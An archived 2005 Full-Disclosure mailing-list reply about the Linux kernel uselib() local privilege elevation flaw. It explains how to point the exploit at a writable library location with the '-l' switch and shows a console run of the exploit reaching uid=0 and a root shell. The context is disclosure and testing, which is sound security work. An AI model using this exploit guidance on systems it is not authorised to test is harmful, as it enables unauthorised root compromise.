[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected
- To: Frank Dietrich <bits_n_bytes@xxxxxx>
- Subject: Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected
- From: Karol Wiesek <appelast@xxxxxxxxxxxxxxxx>
- Date: Sat, 8 Jan 2005 12:21:15 +0100
On Sat, Jan 08, 2005 at 11:38:34AM +0100, Frank Dietrich wrote:
=> Hi there,
=>
=> Paul Starzetz <ihaquer@xxxxxxx> wrote:
=> > Synopsis: Linux kernel uselib() privilege elevation
=> > Product: Linux kernel
=> > Version: 2.4 up to and including 2.4.29-rc2, 2.6 up to and
=>
=> Is the system allways compromisable whitout tmpfs support in the
=> kernel?
=>
=> I tried your exploit sample to test my systems. As normal user I get
=> can't write to /dev/shm. /dev/shm here only writeable for root.
=>
Use -l switch to specify location of lib.
[appelast@nesquik appelast]$ ./ex -l ./lib
[+] SLAB cleanup
child 1 VMAs 65527
child 2 VMAs 65527
child 3 VMAs 33067
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf75c000
Wait... -
[+] race won maps=10888
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc8a66000
[+] gate modified ( 0xffec90fc 0x0804ec00 )
[+] exploited, uid=0
sh-2.05b#
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html